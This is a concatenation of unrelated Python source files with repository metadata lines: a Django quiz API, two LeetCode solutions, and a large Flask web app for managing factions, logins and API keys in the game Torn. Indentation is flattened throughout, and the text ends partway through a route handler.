encontrado_pelo_email["index"] = i
break
if encontrado_pelo_email is not None:
print(f"\nCliente encontrado: {encontrado_pelo_email['cliente'].nome} (index: {encontrado_pelo_email['index']})")
else:
print(f"\nCliente com email {email_busca} não encontrado.") | shDupont/pythonProject | main.py | main.py | py | 6,219 | python | pt | code | 1 | github-code | 36 |
28184080541 | #### @author Arda Göktaş
#### @version 3.11
#### @since 13.12.2022
### @Purposes It exists to send questions and answers in a certain category as an object to the front-end.
class QuizViewSet(viewsets.ModelViewSet): ### to see all the questions in a category
queryset = Quiz.objects.all() ##Retrieves all the quizzes in the database
serializer_class = QuizSerializer ##
@action(detail=True,methods=['get']) ## get method specified to get all questions
def all_questions(self, request, pk=None): # all_question function used to retrieve questions
questions = Question.objects.filter(quiz_id=pk) # Filtering questions by API from url
serializer = QuestionSerializer(
questions,
many=True
) # Specifies the information to be used in the retur section
return Response(serializer.data) # Returns the used information over data
#### @author Mustafa Sergen Haysal
#### @version 3.11
#### @since 13.12.2022
### @Purposes Used to get answers to a specific question and to add a new answer.
class ListCreateAnswer(generics.ListCreateAPIView):
queryset = Answer.objects.all() ### initalize query with all answers in database
serializer_class = AnswerSerializer
def get_queryset(self): ## function that returns only answers to a particular question
return self.queryset.filter(
Q(question__quiz_id=self.kwargs.get('quiz_pk')),
Q(question_id=self.kwargs.get('question_pk'))
) # Return for filter
def perform_create(self, serializer): ## function used to add an answer to a particular question
question = get_object_or_404(
Question,
pk=self.kwargs.get('id')
) # match by id
serializer.save(question=question) | SU-CS308-22FA/Team17-backend | Code Documentation/Code Documentation for py.py | Code Documentation for py.py | py | 1,768 | python | en | code | 0 | github-code | 36 |
17613399951 | # https://leetcode-cn.com/problems/permutations/
class Solution:
def permute(self, nums: List[int]) -> List[List[int]]:
result = []
def backtrace(use_list: List[int], tmp: List[int]):
if len(tmp) == len(nums):
result.append(tmp)
return
for i in range(len(use_list)):
backtrace(use_list[:i] + use_list[i+1:], tmp + [use_list[i]])
backtrace(nums, [])
return result
| xy-hong/codeSnippet | src/python/permutations.py | permutations.py | py | 511 | python | en | code | 0 | github-code | 36 |
2722176063 | class Solution(object):
def updateMatrix(self, matrix):
"""
:type matrix: List[List[int]]
:rtype: List[List[int]]
"""
cols = len(matrix[0])
rows = len(matrix)
q = []
dist = [ [float('inf') for _ in range(cols)] for _ in range(rows)]
# initialize the distance matrix: reuslt
for i in range(rows):
for j in range(cols):
if matrix[i][j] == 0:
dist[i][j] = 0
q.append((i, j))
# classical bfs structure
while q:
x, y = q[0]
q.pop(0)
for a, b in [(x + 1, y), (x - 1, y), (x, y + 1), (x, y - 1)]:
if 0<=a<rows and 0<=b<cols and dist[a][b]-dist[x][y] > 1:
dist[a][b] = dist[x][y] + 1
q.append((a, b))
return dist
def main():
S = Solution()
matrix = \
[[0,0,0],
[0,1,0],
[1,1,1]]
a = S.updateMatrix(matrix)
print(a)
if __name__ == "__main__":
main()
| ZhengLiangliang1996/Leetcode_ML_Daily | Search/542_BFS_01Matrix.py | 542_BFS_01Matrix.py | py | 1,085 | python | en | code | 1 | github-code | 36 |
14640804692 | import logging
import logging.handlers
from flask import Flask, render_template, redirect, request
from flask_sqlalchemy import SQLAlchemy
from flask_login import LoginManager, UserMixin, login_user, login_required, logout_user, current_user
from forms import LoginForm, PaymentForm, PasswordForm, OccalcForm, ApikeyForm, DeleteForm, RegisterForm, OCpolicyForm, LeaderForm, EnemyForm, TimeForm, DeleteEnemyForm, AddEnemyForm
import base64
import datetime
import hashlib
import hmac
import json
import pandas as pd
import re
import sqlite3
import time
import read_sqlite
import dehtml
import random
import password
import challenge
re.numeric = re.compile('^[0-9]+$')
token = re.compile('^([-\d]+)([a-z]+)(\d+)-([0-9a-f]+)$') # used for graphs
combat_token = re.compile('^([-\d]+)-([-\d]+)([a-z]+)(\d+)-([0-9a-f]+)$') # used for combat events
bonus_token = re.compile('^([-\d]+)-([-\d]+)bonus(\d+)-([0-9a-f]+)$') # used for chain bonus record
armory_token = re.compile('^([-\d]+)-(\d+)-([0-9a-f]+)$')
enemy_token = re.compile('^([-\d]+)-(\d+)-(\d+)-([0-9a-f]+)$')
target_token = re.compile('^([-\d]+)-(\d+)-(\d+)-(\d+)-([0-9a-f]+)$')
time_interval = re.compile('^(\d+)-(\d+)$')
# f_id, crimetype, timestamp, (either number or 'history'), hmac
oc_history_picker = re.compile('^([-\d]+)-([0-9])-([0-9]+)-([0-9a-z]+)-([0-9a-f]+)$')
chain_token = re.compile('^(\d+)-chain-(\d+)-(\d+)-([0-9a-f]+)$')
chain_token_o = re.compile('^(\d+)-scoreboard-(\d+)-(\d+)-([0-9a-f]+)-([a-z]+)$') # with ordering parameter
now = int(time.time())
# Now there is just one way to read this.
rodb = read_sqlite.Rodb()
hmac_key = rodb.getkey()
rodb = None
app = Flask(__name__)
app.config.from_pyfile('config.py')
loghandler = logging.handlers.RotatingFileHandler('/home/peabrain/logs/tu0036.log', maxBytes=1024 * 1024, backupCount=10)
loghandler.setLevel(logging.INFO)
app.logger.setLevel(logging.INFO)
app.logger.addHandler(loghandler)
db = SQLAlchemy(app)
login_manager = LoginManager()
login_manager.init_app(app)
class LUser(UserMixin, db.Model):
id = db.Column(db.Integer, primary_key=True)
username = db.Column(db.String(30), unique=True) # torn numeric id
login_allowed = db.Column(db.Integer) # int used as bool
must_change_pw = db.Column(db.Integer) # int used as bool
pwhash = db.Column(db.String(255)) # a hash
registered = db.Column(db.Integer) # et account created
confirmed = db.Column(db.Integer) # et confirmed, or 0 if not confirmed
last_login = db.Column(db.Integer) # et
failed_logins = db.Column(db.Integer) # reset to 0 on success
pw_ver = db.Column(db.Integer) # 1=sha1, 2=bcrypt
#
# see is_authenticated() is_anonymous() get_id()
class Payment_cache(db.Model):
id = db.Column(db.Integer, primary_key=True)
faction_id = db.Column(db.Integer)
oc_plan_id = db.Column(db.Integer)
timestamp = db.Column(db.Integer)
paid_by = db.Column(db.Integer)
class Report_number_oc(db.Model):
id = db.Column(db.Integer, primary_key=True)
timestamp = db.Column(db.Integer)
pid = db.Column(db.Integer)
number_oc = db.Column(db.Integer)
class Banned_pw(db.Model):
id = db.Column(db.Integer, primary_key=True)
sha = db.Column(db.String(40)) # sha1 of a prohibited pw
class Apikey_history(db.Model):
id = db.Column(db.Integer, primary_key=True)
username = db.Column(db.String(30))
et_web_update = db.Column(db.Integer)
deleted = db.Column(db.Integer)
class Ocpolicy(db.Model):
id = db.Column(db.Integer, primary_key=True)
faction = db.Column(db.Integer)
timestamp = db.Column(db.Integer)
percent = db.Column(db.Numeric(6,2))
username = db.Column(db.String(30))
octype = db.Column(db.Integer)
class Extra_leaders(db.Model):
id = db.Column(db.Integer, primary_key=True)
et = db.Column(db.Integer)
faction_id = db.Column(db.Integer)
player_id = db.Column(db.Integer)
is_leader = db.Column(db.Integer)
set_by = db.Column(db.Integer)
class Challenge(db.Model):
id = db.Column(db.Integer, primary_key=True)
et = db.Column(db.Integer)
expires = db.Column(db.Integer)
used = db.Column(db.Integer)
username = db.Column(db.String(30), unique=True) # torn numeric id
action = db.Column(db.String(20))
data = db.Column(db.String(60))
pw_ver = db.Column(db.Integer)
pw_ver = db.Column(db.Integer)
chal_type = db.Column(db.String(10))
expect = db.Column(db.String(40))
class Response(db.Model):
id = db.Column(db.Integer, primary_key=True)
et = db.Column(db.Integer)
used = db.Column(db.Integer)
username = db.Column(db.String(30), unique=True) # torn numeric id
chal_type = db.Column(db.String(10))
provided = db.Column(db.String(40))
class Enemy(db.Model):
id = db.Column(db.Integer, primary_key=True)
tornid = db.Column(db.String(30)) # torn numeric id
username = db.Column(db.String(30))
f_id = db.Column(db.Integer)
class Timerange(db.Model):
id = db.Column(db.Integer, primary_key=True)
tstart = db.Column(db.Integer)
tend = db.Column(db.Integer)
f_id = db.Column(db.Integer)
class Chains(db.Model):
pg_chain_id = db.Column(db.Integer, primary_key=True)
f_id = db.Column(db.Integer)
et = db.Column(db.Integer)
chain_len = db.Column(db.Integer)
tstart = db.Column(db.Integer)
tend = db.Column(db.Integer)
torn_chain_id = db.Column(db.Integer)
respect = db.Column(db.String(16))
class Chain_player_sum(db.Model):
pk = db.Column(db.Integer, primary_key=True)
pg_chain_id = db.Column(db.Integer)
player_id = db.Column(db.Integer)
actions = db.Column(db.Integer)
attacked = db.Column(db.Integer)
hospitalized = db.Column(db.Integer)
mugged = db.Column(db.Integer)
respect = db.Column(db.Integer)
att_stale = db.Column(db.Integer)
lost = db.Column(db.Integer)
att_escape = db.Column(db.Integer)
def_stale = db.Column(db.Integer)
defend = db.Column(db.Integer)
def_escape = db.Column(db.Integer)
class Chain_members(db.Model):
mempk = db.Column(db.Integer, primary_key=True)
pg_chain_id = db.Column(db.Integer)
player_id = db.Column(db.Integer)
player_name = db.Column(db.String(16))
class Bonus_events(db.Model):
bonus_pk_id = db.Column(db.Integer, primary_key=True)
pg_chain_id = db.Column(db.Integer)
et = db.Column(db.Integer)
att_name = db.Column(db.String(16))
att_id = db.Column(db.Integer)
verb = db.Column(db.String(16))
def_name = db.Column(db.String(16))
def_id = db.Column(db.Integer)
outcome = db.Column(db.String(20))
num_respect = db.Column(db.Numeric(12,4))
@login_manager.user_loader
def load_user(user_id):
return LUser.query.get(int(user_id)) # returns whole object
# this logs someone out
@app.route('/logout')
def logout():
logout_user()
return redirect('/')
#=================================================================================
def obtain_leaders_for_faction(pid, fid):
# extra leaders from ORM
rodb = read_sqlite.Rodb()
faction_sum = rodb.get_faction_for_player(pid)
extra = {faction_sum['leader']: [1, 1, faction_sum['leadername'], 'Torn', 'mists of time'], faction_sum['coleader']: [1, 1, faction_sum['coleadername'], 'Torn', 'mists of time']}
leader_orm = {}
extras = Extra_leaders.query.filter_by(faction_id = fid).all()
for leader in extras:
pid = leader.player_id
if (not pid in leader_orm) or (leader.et > leader_orm[pid][1]):
leader_orm[leader.player_id] = [leader.is_leader, leader.et, rodb.pid2n[str(pid)], rodb.pid2n[str(leader.set_by)], time.strftime("%Y-%m-%d %H:%M",time.gmtime(leader.et))]
# only the players with a 1 for is_leader from their latest record in ORM and the two recignised by Torn
for kl in leader_orm.keys():
if leader_orm[kl][0]: extra[kl] = leader_orm[kl]
return extra
#=================================================================================
def bool_leader(pid, fid):
leaders = obtain_leaders_for_faction(pid, fid)
return pid in leaders
#=================================================================================
@app.route('/', methods = ['GET','POST'])
@app.route('/login', methods = ['GET','POST'])
def login():
form = LoginForm()
if form.validate_on_submit():
try:
u = request.form['username']
p = request.form['password']
reject = True # assume rejection
allowed_login = False
except:
app.logger.info('error reading from login form')
return render_template('login.html', title='Sign In', form=form)
wantuser = LUser.query.filter_by(username = u).first()
if not wantuser:
# unknown username
if not re.numeric.match(u):
u = 'bad username (must be all numeric)'
return render_template('bad_login.html', title='bad login attempt', u=u)
try:
lastt = wantuser.last_login
nfail = wantuser.failed_logins
hash_version = wantuser.pw_ver
except:
return "failed somehow"
return render_template('login.html', title='Sign In', form=form)
if wantuser.login_allowed and password.checkpw(hash_version, p, wantuser.pwhash):
reject = False
if not reject:
wantuser.last_login = int(time.time())
wantuser.failed_logins = 0
login_user(wantuser)
db.session.commit()
if lastt:
lastt = datetime.datetime.fromtimestamp(lastt)
else:
lastt = 'never'
app.logger.info('%s logged in successfully', u)
for rh in request.headers:
app.logger.info('%s had request header %s', u, rh)
return render_template('good_login.html', title='successful login', u=u, nfail=nfail, lastt=lastt, must_change_pw=wantuser.must_change_pw)
wantuser.failed_logins += 1
db.session.commit()
return render_template('bad_login.html', title='bad login attempt', u=u)
# show form before submission
return render_template('login.html', title='Sign In', form=form)
#=================================================================================
# This is for testing flask without the web server.
@app.route("/rhubarb/<anything_here>", methods=['GET'])
def no_rhubarb(anything_here):
return redirect('/' + anything_here)
#=================================================================================
@app.route('/register', methods = ['GET','POST'])
def register():
form = RegisterForm()
u = 'default-u'
p = 'default-p'
c = 'default-c'
if form.validate_on_submit():
try:
u = request.form['username']
p = request.form['password']
c = request.form['checkbox']
except:
return render_template('register.html', title='Register', form=form, retry=True)
# is username numeric?
if not re.numeric.match(u):
return render_template('accounts_explained.html', title='Accounts Explained')
# does user already exist?
wantuser = LUser.query.filter_by(username = u).first()
if wantuser:
return render_template('message.html', message='That username is already in use. If already registered and confirmed use login. Or wait for a past registration attempt to expire and retry.', logged_in=False)
# is pw acceptable?
if not test_strength(p):
return render_template('message.html', message='That password is not allowed - too obvious.', logged_in=False)
# is cookie consent on?
if c != 'yes':
return render_template('message.html', title='Message', message='Consent to a cookie (for a logged-in session) is required.', logged_in=False)
pw_ver, pwhash = password.pwhash(0, p)
et = int(time.time())
newu = LUser (username=str(u), login_allowed=0, must_change_pw=0, pw_ver=pw_ver, pwhash=pwhash, registered=et, confirmed=0, last_login=0, failed_logins=0)
db.session.add(newu)
db.session.commit()
# set challenge to be done before confirmed is set
new_random_challenge = challenge.Challenge()
expected = 'NEWUSER:' + new_random_challenge.get_rfc1760_challenge()
newc = Challenge(et=et, expires=et+900, used=0, username=u, action='newuser', data='', chal_type='message', expect=expected, pw_ver=pw_ver)
db.session.add(newc)
db.session.commit()
return render_template('challenge.html', title='In-game challenge', challenge=expected)
return render_template('register.html', title='Register', form=form, retrry=False)
#=================================================================================
# This is not the same as "settings" change when pw is known.
@app.route("/rhubarb/unknown_pw_reset", methods=['GET','POST'])
@app.route("/unknown_pw_reset", methods=['GET','POST'])
def unknown_pw_reset():
form = LoginForm() # requests username and password
# - - - - - - - POST section
if request.method == 'POST':
u = None
p = None
if form.validate_on_submit():
try:
u = request.form['username']
p = request.form['password']
# another job either uses or discards the data provided here
except:
app.logger.info('error reading from login form for pw reset')
return redirect('/rhubarb/unknown_pw_reset')
else:
app.logger.info('change_pw form fails validation')
return redirect('/rhubarb/unknown_pw_reset')
if not test_strength(p):
return render_template('message.html', message='That password is not allowed - too obvious.', logged_in=False)
ban_digest = hashlib.sha1(bytes(p, 'utf-8')).hexdigest()
ban = Banned_pw(sha = ban_digest)
db.session.add(ban)
db.session.commit()
# rate limit - not too many of these allowed at once
rate_discovery = Challenge.query.filter_by(username = u).all()
if len(rate_discovery) > 10:
return render_template('message.html', message='Too many reset attempts - need to wait.', logged_in=False)
# set challenge to be done before applied to l_user table
new_random_challenge = challenge.Challenge()
expected = 'PWRESET:' + new_random_challenge.get_rfc1760_challenge()
et = int(time.time())
pw_ver, pwhash = password.pwhash(0, p)
newc = Challenge(et=et, expires=et+900, used=0, username=u, action='pwreset', data=pwhash, pw_ver=pw_ver, chal_type='message', expect=expected)
db.session.add(newc)
db.session.commit()
return render_template('challenge.html', title='In-game challenge', challenge=expected)
# - - - - - - - POST section
return render_template('pw_reset.html', form=form)
#=================================================================================
@app.route("/settings", methods=['GET'])
@login_required
def settings():
if current_user.must_change_pw:
return redirect('/rhubarb/change_pw')
u = current_user.username
rodb = read_sqlite.Rodb()
player = rodb.get_player_data(current_user.username)
name = player['name']
# check whether API key has worked recently for player
# XXX and faction
# et_pstats, et_set, short_err, long_err
got_key = [0,0]
ak_stats = list(rodb.has_api_key(u)) # simple numeric values
if ak_stats[0]:
got_key[0] = 1
# compare to ORM
not_obsolete = 1 # assume sqlite is current then check whether there is a more recent psql
wantevent = Apikey_history.query.filter_by(username = u).first()
if wantevent:
if wantevent.et_web_update > ak_stats[1]:
not_obsolete = 0 # psql more recent
if wantevent.deleted:
got_key[0] = 0
# massage for human readability
if ak_stats[0] and ak_stats[3]:
if ak_stats[3] < ak_stats[0]:
# error has been fixed
ak_stats[3] = 0
else:
# problem been seen
got_key[1] = 1
if ak_stats[2] < ak_stats[0]:
# error has been fixed
ak_stats[2] = 0
else:
# problem been seen
got_key[1] = 1
ak_stats[0] = time.strftime("%Y-%m-%d %H:%M",time.gmtime(ak_stats[0]))
ak_stats[1] = time.strftime("%Y-%m-%d %H:%M",time.gmtime(ak_stats[1]))
oc_calc_sr = 0
want_oc = Report_number_oc.query.filter_by(pid = u).all()
for i in want_oc:
if player['oc_calc'] != i.number_oc:
oc_calc_sr = i.number_oc # self-reported number
return render_template('settings.html', title='Tornutopia Settings', u=u, name=name, player=player, oc_calc_sr=oc_calc_sr, got_key=got_key, ak_stats=ak_stats, not_obsolete=not_obsolete)
#=================================================================================
@app.route("/change_pw", methods=['GET','POST'])
@login_required
def change_pw():
u = current_user.username
rodb = read_sqlite.Rodb()
player = rodb.get_player_data(current_user.username)
name = player['name']
form = PasswordForm()
# - - - - - - - POST section
if request.method == 'POST':
old_pw = None
new_pw = None
if form.validate_on_submit():
try:
old_pw = request.form['old_password']
new_pw = request.form['new_password']
except:
app.logger.info('error reading from change_pw form')
return redirect('/rhubarb/change_pw')
else:
app.logger.info('change_pw form fails validation')
return redirect('/rhubarb/change_pw')
# is old pw correct?
wantuser = LUser.query.filter_by(username = u).first()
if not wantuser:
# should never happen - has this user been deleted while logged in?
return redirect('/rhubarb/logout')
if not password.checkpw(wantuser.pw_ver, old_pw, wantuser.pwhash):
return render_template('message.html', message='old password incorrect', logged_in=True)
# is new pw acceptable?
if not test_strength(new_pw):
return render_template('message.html', message='That password is not allowed - too obvious.', logged_in=True)
# set new pwhash for u and show success
v,h = password.pwhash(0, new_pw)
if not v or not h:
return render_template('message.html', message='failure to handle new password', logged_in=True)
# set new password and add to banned list
wantuser.pw_ver = v
wantuser.pwhash = h
wantuser.must_change_pw = 0
db.session.commit()
ban_digest = hashlib.sha1(bytes(new_pw, 'utf-8')).hexdigest()
ban = Banned_pw(sha = ban_digest)
db.session.add(ban)
db.session.commit()
return render_template('message.html', message='password changed', logged_in=True)
# - - - - - - - POST section
return render_template('set_pw.html', title='Tornutopia Settings', u=u, name=name, player=player, form=form)
#=================================================================================
@app.route("/set_oc_calc", methods=['GET','POST'])
@login_required
def set_oc_calc():
if current_user.must_change_pw:
return redirect('/rhubarb/change_pw')
u = current_user.username
rodb = read_sqlite.Rodb()
player = rodb.get_player_data(current_user.username)
name = player['name']
number_oc = 0
form = OccalcForm()
if request.method == 'POST':
if form.validate_on_submit():
try:
number_oc = request.form['number_oc']
except:
return render_template('message.html', message='Something failed about reading from occalcform.', logged_in=True)
else:
app.logger.info('set_oc_calc form fails validation')
return render_template('message.html', message='Form fails validation.', logged_in=True)
if int(number_oc) > 0:
new_id=int(random.random() * 1000000000)
report_number_oc = Report_number_oc(id=new_id, timestamp=int(time.time()), pid=int(u), number_oc=number_oc)
db.session.add(report_number_oc)
db.session.commit()
return redirect('/rhubarb/settings')
return render_template('set_oc_calc.html', title='Tornutopia Settings', u=u, name=name, player=player, form=form)
#=================================================================================
@app.route("/delete_api_key", methods=['GET','POST'])
@login_required
def delete_api_key():
if current_user.must_change_pw:
return redirect('/rhubarb/change_pw')
new_fname = '/var/torn/spool/collect/' + str(int(random.random() * 1000000000))
with open(new_fname, 'w') as api_out:
print("DELETE APIKEY\n" + str(current_user.username) + "\nEND", file=api_out)
event = Apikey_history(username=str(current_user.username), et_web_update=int(time.time()), deleted=1)
db.session.add(event)
db.session.commit()
return render_template('message.html', message='accepted command to delete API key', logged_in=True)
#=================================================================================
@app.route("/set_api_key", methods=['GET','POST'])
@login_required
def set_api_key():
if current_user.must_change_pw:
return redirect('/rhubarb/change_pw')
u = current_user.username
rodb = read_sqlite.Rodb()
player = rodb.get_player_data(current_user.username)
name = player['name']
form = ApikeyForm()
# - - - - - - - POST section
if request.method == 'POST':
if form.validate_on_submit():
try:
apikey = request.form['apikey']
use_for_faction = request.form['use_for_faction']
except:
return render_template('message.html', message='something failed about reading', logged_in=True)
else:
app.logger.info('error reading from ApikeyForm')
return render_template('message.html', message='ApikeyForm fails validation.', logged_in=True)
new_fname = '/var/torn/spool/collect/' + str(int(random.random() * 1000000000))
with open(new_fname, 'w') as api_out:
print("APIKEY\n" + apikey + '\n' + str(use_for_faction) + "\nEND", file=api_out)
event = Apikey_history(username=str(current_user.username), et_web_update=int(time.time()), deleted=0)
db.session.add(event)
db.session.commit()
return redirect('/rhubarb/settings')
# - - - - - - - POST section
return render_template('set_api_key.html', title='Tornutopia Settings', u=u, name=name, player=player, form=form)
#=================================================================================
@app.route("/delete_account", methods=['GET','POST'])
@login_required
def delete_account():
u = current_user.username
rodb = read_sqlite.Rodb()
player = rodb.get_player_data(current_user.username)
name = player['name']
form = DeleteForm()
# - - - - - - - POST section
if request.method == 'POST':
if form.validate_on_submit():
try:
pw = request.form['password']
except:
return render_template('message.html', title='Delete Failed', message='something failed about reading from deleteform', logged_in=False)
else:
app.logger.info('delete_account form fails validation')
return redirect('/rhubarb/settings')
wantuser = LUser.query.filter_by(username = u).first()
if not wantuser:
return render_template('message.html', title='Delete Failed', message='user to be deleted cannot be found', logged_in=False)
# check password
if not password.checkpw(wantuser.pw_ver, pw, wantuser.pwhash):
return render_template('message.html', title='Delete Failed', message='wrong password', logged_in=True)
db.session.delete(wantuser)
db.session.commit()
return redirect('/rhubarb/logout')
# - - - - - - - POST section
return render_template('delete_account.html', title='Tornutopia Settings', u=u, name=name, player=player, form=form)
#=================================================================================
@app.route('/faction_ov')
@login_required
def faction_ov():
if current_user.must_change_pw:
return redirect('/rhubarb/change_pw')
rodb = read_sqlite.Rodb()
faction_sum = rodb.get_faction_for_player(current_user.username)
big_losses = rodb.recent_big_losses(faction_sum['fid'])
player = rodb.get_player_data(current_user.username)
is_leader = bool_leader(int(current_user.username), faction_sum['fid'])
friendly_fires = rodb.get_friendly_fire(faction_sum['fid'])
# extra leaders from ORM
extra = obtain_leaders_for_faction(current_user.username, faction_sum['fid'])
return render_template('faction_ov.html', title='Faction Overview', u=current_user.username, player=player, faction_sum=faction_sum,
is_leader=is_leader, friendly_fires=friendly_fires, extra=extra, nrbl=len(big_losses), big_losses=big_losses)
#=================================================================================
@app.route('/leaders', methods=['GET','POST'])
@login_required
def leaders():
rodb = read_sqlite.Rodb()
faction_sum = rodb.get_faction_for_player(current_user.username)
is_leader = bool_leader(int(current_user.username), faction_sum['fid'])
extra = obtain_leaders_for_faction(current_user.username, faction_sum['fid'])
form = LeaderForm()
#
form.player_demote.choices = [(0, 'no selection')]
for eleader in extra:
form.player_demote.choices.append((eleader, extra[eleader][2]))
#
form.player_promote.choices = [(0, 'no selection')]
for pid in sorted(faction_sum['members']):
# members of this faction, and only if they are not leaders already
if not bool_leader(int(pid), faction_sum['fid']):
form.player_promote.choices.append((pid, rodb.pid2n[pid]))
# - - - - - - - POST section
if request.method == 'POST':
if not is_leader:
return redirect('/rhubarb/logout')
player_demote = None
player_promote = None
#
if form.is_submitted():
try:
player_demote = request.form['player_demote']
except:
pass
try:
player_promote = request.form['player_promote']
except:
pass
else:
return render_template('message.html', title='Change leaders', message='validation of LeaderForm failed', logged_in=True)
# player_demote and player_promote are str and '0' is a valid value meaning no selection.
if not player_demote or not player_promote:
return render_template('message.html', title='Change leaders', message='valid input not detected', logged_in=True)
now = int(time.time())
if player_demote != '0':
dl = Extra_leaders(et=now, faction_id=int(faction_sum['fid']), player_id=int(player_demote), is_leader=0, set_by=int(current_user.username))
db.session.add(dl)
if player_promote != '0':
pl = Extra_leaders(et=now, faction_id=int(faction_sum['fid']), player_id=int(player_promote), is_leader=1, set_by=int(current_user.username))
db.session.add(pl)
db.session.commit()
return redirect('/rhubarb/faction_ov')
# - - - - - - - POST section
return render_template('leaders.html', title='Leader Appointment', faction_sum=faction_sum, is_leader=is_leader, form=form)
#=================================================================================
@app.route('/pay_policy', methods=['GET','POST'])
@login_required
def pay_policy():
rodb = read_sqlite.Rodb()
oc_num2title = rodb.get_oc_titles()
faction_sum = rodb.get_faction_for_player(current_user.username)
is_leader = bool_leader(int(current_user.username), faction_sum['fid'])
form = OCpolicyForm()
form.cn.choices = [(k, oc_num2title[k]) for k in sorted(oc_num2title.keys())]
# - - - - - - - POST section
if request.method == 'POST':
if not is_leader:
return redirect('/rhubarb/logout')
if form.validate_on_submit():
try:
cn = request.form['cn']
percent = request.form['percent']
except:
app.logger.info('error involving OCpolicyForm')
return render_template('message.html', title='change to pay policy', message='OCpolicyForm exception reading input', logged_in=True)
else:
app.logger.info('OCpolicyForm fails validation')
return render_template('message.html', title='change to pay policy', message='OCpolicyForm failed validation', logged_in=True)
try:
policy_update = Ocpolicy(faction=int(faction_sum['fid']), timestamp=int(time.time()), percent=percent, username=current_user.username, octype=cn)
db.session.add(policy_update)
db.session.commit()
except:
app.logger.info('error inserting ino Ocpolicy ORM')
return render_template('message.html', title='change to pay policy', message='Change of pay policy failed to update DB.', logged_in=True)
return redirect('/rhubarb/pay_policy')
# - - - - - - - POST section
# read policy from sqlite
read_policy = rodb.get_oc_payment_policy(faction_sum['fid'])
policy = {} # mutable to produce human-readable times
for k in sorted(read_policy.keys()):
et = read_policy[k][0]
policy[k] = list(read_policy[k])
policy[k][0] = time.strftime("%Y-%m-%d %H:%M",time.gmtime(et))
if str(read_policy[k][3]) in rodb.pid2n:
policy[k][3] = rodb.pid2n[ str(read_policy[k][3]) ]
# check the orm for a cached alteration to the figures from sqlite
pending = 0
want_policy_change = Ocpolicy.query.filter_by(faction = faction_sum['fid']).all()
for pol_item in want_policy_change:
if pol_item.octype not in policy:
pending=1
break
if float(pol_item.percent) != float(policy[pol_item.octype][2]):
pending=1
break
return render_template('pay_policy.html', title='Pay Policy', u=current_user.username, is_leader=is_leader, policy=policy, oc_num2title=oc_num2title, pending=pending, form=form)
#=================================================================================
@app.route('/faction_player_table')
@login_required
def faction_player_table():
if current_user.must_change_pw:
return redirect('/rhubarb/change_pw')
rodb = read_sqlite.Rodb()
faction_sum = rodb.get_faction_for_player(current_user.username)
player = rodb.get_player_data(current_user.username)
is_leader = bool_leader(int(current_user.username), faction_sum['fid'])
if not is_leader:
return render_template('message.html', title='Faction Player Table Denied', u=current_user.username, player=player, message='No access to player table!', logged_in=True)
pt = rodb.get_player_table(faction_sum) # take advantage of having looked this up already
return render_template('faction_player_table.html', title='Faction Player Table', u=current_user.username, player=player, faction_sum=faction_sum, is_leader=is_leader, pt=pt)
#=================================================================================
@app.route('/home')
@login_required
def home():
if current_user.must_change_pw:
return redirect('/rhubarb/change_pw')
rodb = read_sqlite.Rodb()
faction_sum = rodb.get_faction_for_player(current_user.username)
player = rodb.get_player_data(current_user.username)
is_leader = bool_leader(int(current_user.username), faction_sum['fid'])
f_id = faction_sum['fid']
p_id = int(current_user.username)
# what do we know about this player being a leader?
maybe_leader = Extra_leaders.query.filter_by(faction_id = int(faction_sum['fid'])).filter_by(player_id = int(current_user.username)).all()
leader_entry = False
et = 0
set_by = None
any_data = False
for ml in maybe_leader:
if ml.et > et:
any_data = True
et = ml.et
set_by = ml.set_by
leader_entry = True if ml.is_leader else False
if any_data:
leader_record = [any_data, leader_entry, time.strftime("%Y-%m-%d %H:%M",time.gmtime(et)), rodb.pid2n[str(set_by)]]
else:
leader_record = [any_data, False, 'never', '']
payment_due = []
if is_leader:
payment_due = rodb.oc_payment_check(faction_sum['fid'])
return render_template('home.html', title='home', u=current_user.username,
player=player, faction_sum=faction_sum, is_leader=is_leader,
leader_record=leader_record, payment_due=payment_due)
#=================================================================================
@app.route("/rhubarb/graph/<what_graph>", methods=['GET'])
@app.route("/graph/<what_graph>", methods=['GET'])
def jsgraph(what_graph):
p_id = None
graph_type = None
timestamp = None
given_hmac = None
df = None
right_now = int(time.time())
# what graph is this meant to produce?
re_object = token.match(what_graph)
if re_object:
p_id = re_object.group(1)
graph_type = re_object.group(2)
timestamp = re_object.group(3)
given_hmac = re_object.group(4)
else:
app.logger.info('in jsgraph RE did not match URL')
return render_template("bad_graph_request.html")
# calc correct hmac
if 'crime' == graph_type:
graph_selection = ( str(p_id) + 'crime' + str(timestamp) ).encode("utf-8")
elif 'drug' == graph_type:
graph_selection = ( str(p_id) + 'drug' + str(timestamp) ).encode("utf-8")
else:
return render_template("bad_graph_request.html")
hmac_hex = hmac.new(hmac_key, graph_selection, digestmod=hashlib.sha1).hexdigest()
# test for correct hmac
if not hmac.compare_digest(hmac_hex, given_hmac):
app.logger.info('in jsgraph HMAC disagreement')
return render_template("bad_graph_request.html")
# test for acceptable timestamp
if ((int(timestamp) + 86400) < right_now):
app.logger.info('in jsgraph timestamp is old')
return render_template("bad_graph_request.html")
conn = sqlite3.connect('file:/var/torn/readonly_db?mode=ro', uri=True)
if 'crime' == graph_type:
parm = (int(p_id),)
df = pd.read_sql_query("select et,selling_illegal_products,theft,auto_theft,drug_deals,computer_crimes,murder,fraud_crimes,other,total from playercrimes where player_id=? order by et", conn, params=parm)
elif 'drug' == graph_type:
parm = (int(p_id),)
df = pd.read_sql_query("select et,cantaken,exttaken,lsdtaken,opitaken,shrtaken,pcptaken,xantaken,victaken,spetaken,kettaken from drugs where player_id=? order by et", conn, params=parm)
else:
conn.close()
return render_template("bad_graph_request.html")
conn.close()
# Does df contain reasonable data? TODO
# convert et to date-as-string so it can be parsed in JS
df['et'] = pd.to_datetime(df['et'],unit='s').astype(str)
chart_data = df.to_dict(orient='records')
data = {'chart_data': chart_data}
if 'crime' == graph_type:
return render_template("playercrimes.html", data=data)
elif 'drug' == graph_type:
return render_template("drug.html", data=data)
else:
return render_template("bad_graph_request.html")
#=================================================================================
@app.route("/rhubarb/faction_oc_history/<tid_cn_t>", methods=['GET','POST'])
@app.route("/faction_oc_history/<tid_cn_t>", methods=['GET','POST'])
@login_required
def faction_oc_history(tid_cn_t):
if current_user.must_change_pw:
return redirect('/rhubarb/change_pw')
# fid, cn, history-or-et
percent_to_pay = 0
cu = current_user.username
logged_in = True
tid = None
cn = None
timestamp = None
history_column = None
hmac_given = None
re_object = oc_history_picker.match(tid_cn_t)
if re_object:
tid = re_object.group(1)
cn = re_object.group(2)
timestamp = re_object.group(3)
history_column = re_object.group(4)
hmac_given = re_object.group(5)
else:
